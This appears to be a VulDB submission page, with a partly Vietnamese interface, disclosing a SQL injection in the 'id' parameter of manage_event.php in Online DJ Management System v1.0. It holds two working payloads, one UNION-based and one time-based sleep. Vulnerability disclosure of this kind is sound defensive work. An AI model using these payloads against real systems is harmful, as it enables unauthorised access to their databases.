Gửi #149027: Online DJ Management System v1.0 /odjms/admin/events/manage_event.php GET parameter id exists SQL injection vulnerabilitythông tin

tiêu đềOnline DJ Management System v1.0 /odjms/admin/events/manage_event.php GET parameter id exists SQL injection vulnerability
Mô tảAn issue was discovered in Online DJ Management System v1.0. There is a SQL injection that can directly issue instructions to the background database system via /odjms/admin/events/manage_event.php?id. Payload1:id=-1' union all select null,null,concat(0x414243,0x7576777879),null,null,null,null-- - Payload2:id=1' and (select 1 from (select(sleep(15)))l) and 'v'='v
Nguồn⚠️ https://github.com/aieouZZ/bug_report/blob/main/SQLi-1.md
Người dùng
 LiZhang (UID 45734)
Đệ trình26/04/2023 11:22 (cách đây 3 những năm)
Kiểm duyệt28/04/2023 13:19 (2 days later)
Trạng tháiđược chấp nhận
Mục VulDB227646 [SourceCodester Online DJ Management System 1.0 GET Parameter manage_event.php ID Tiêm SQL]
điểm19

TrướcTổng QuanTiếp theo

Want to know what is going to be exploited?

We predict KEV entries!